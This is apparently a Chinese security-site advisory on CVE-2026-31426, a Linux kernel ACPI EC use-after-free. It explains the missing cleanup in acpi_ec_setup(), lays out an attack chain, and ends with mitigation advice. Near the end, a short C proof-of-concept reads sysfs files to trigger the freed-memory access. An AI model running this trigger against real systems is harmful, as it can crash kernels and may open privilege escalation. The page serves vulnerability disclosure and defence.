CVE-2026-31426 CVSS 7.0 高危

CVE-2026-31426 Linux内核ACPI EC释放后使用漏洞

披露日期: 2026-04-13

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31426

漏洞类型

释放后使用

CVSS评分

7.0 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核

漏洞概述

Linux内核的ACPI EC驱动存在释放后使用漏洞。在精简硬件平台上，当GPIO IRQ提供程序探测延迟导致EC处理程序安装失败时，系统未正确清理已注册的资源。这导致在acpi_ec结构体被释放后，ACPICA中仍残留指向该内存的悬空指针。后续用户空间读取sysfs触发AML代码访问EC区域时，内核将访问已释放的内存，可能导致系统崩溃或权限提升。

技术细节

该漏洞源于Linux内核drivers/acpi/ec.c中acpi_ec_setup()函数的错误处理缺陷。当ec_install_handlers()在精简硬件平台返回-EPROBE_DEFER错误时，意味着GPIO IRQ提供程序尚未就绪。此时，函数已启动EC并安装了地址空间处理程序，但在错误路径中未调用ec_remove_handlers()进行清理。随后，acpi_ec_add()释放了acpi_ec结构体，而ACPICA内核子系统的地址空间处理程序仍持有指向该已释放内存的上下文指针。当后续发生AML评估（例如通过sysfs读取电池、热区或背光状态）时，acpi_ev_address_space_dispatch会调用acpi_ec_space_handler，该函数尝试对已释放的acpi_ec结构体执行mutex_lock操作，从而触发KASAN检测到的slab-use-after-free错误。由于触发条件仅需常规的本地文件读取操作，且无需特殊权限，该漏洞具有潜在的安全风险。

攻击链分析

STEP 1

步骤1：系统启动与探测延迟

系统在精简硬件平台上启动，GPIO IRQ提供程序探测延迟，导致acpi_ec_setup中的ec_install_handlers返回-EPROBE_DEFER。

STEP 2

步骤2：资源清理缺失

acpi_ec_setup直接返回错误，未调用ec_remove_handlers清理已启动的EC和已安装的地址空间处理程序。

STEP 3

步骤3：结构体释放

调用者acpi_ec_add释放了struct acpi_ec，但ACPICA中仍保留指向该内存的地址空间处理程序指针，形成悬空指针。

STEP 4

步骤4：触发AML执行

本地低权限用户读取sysfs文件（如电池状态），导致内核执行AML代码以访问EC OpRegion。

STEP 5

步骤5：利用漏洞

acpi_ec_space_handler被调用，尝试使用已释放的acpi_ec结构体，触发Use-After-Free，导致内核崩溃或潜在代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31426: Linux Kernel ACPI EC Use-After-Free
 * Trigger: Read sysfs entries that cause AML evaluation touching EC OpRegion.
 * Context: Requires a vulnerable kernel state (reduced-hardware platform with deferred GPIO IRQ).
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

void trigger_acpi_ec_uaf() {
    const char* sysfs_paths[] = {
        "/sys/class/power_supply/BAT0/status",
        "/sys/class/thermal/thermal_zone0/temp",
        "/sys/class/backlight/acpi_video0/brightness",
        NULL
    };

    for (int i = 0; sysfs_paths[i] != NULL; i++) {
        int fd = open(sysfs_paths[i], O_RDONLY);
        if (fd >= 0) {
            char buf[32];
            // Reading these files triggers AML execution that accesses EC OpRegion
            if (read(fd, buf, sizeof(buf)) < 0) {
                perror("Read failed");
            }
            close(fd);
        }
    }
}

int main() {
    printf("[+] Attempting to trigger CVE-2026-31426...\n");
    trigger_acpi_ec_uaf();
    printf("[+] Trigger completed. Check kernel logs for KASAN reports.\n");
    return 0;
}

影响范围

Linux内核 (修复前的版本)

防御指南

临时缓解措施

建议尽快更新内核版本。若无法立即更新，应限制非特权用户对系统sysfs接口的访问权限，尽管这可能仅降低触发概率而无法从根本上修复内核层面的内存错误。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表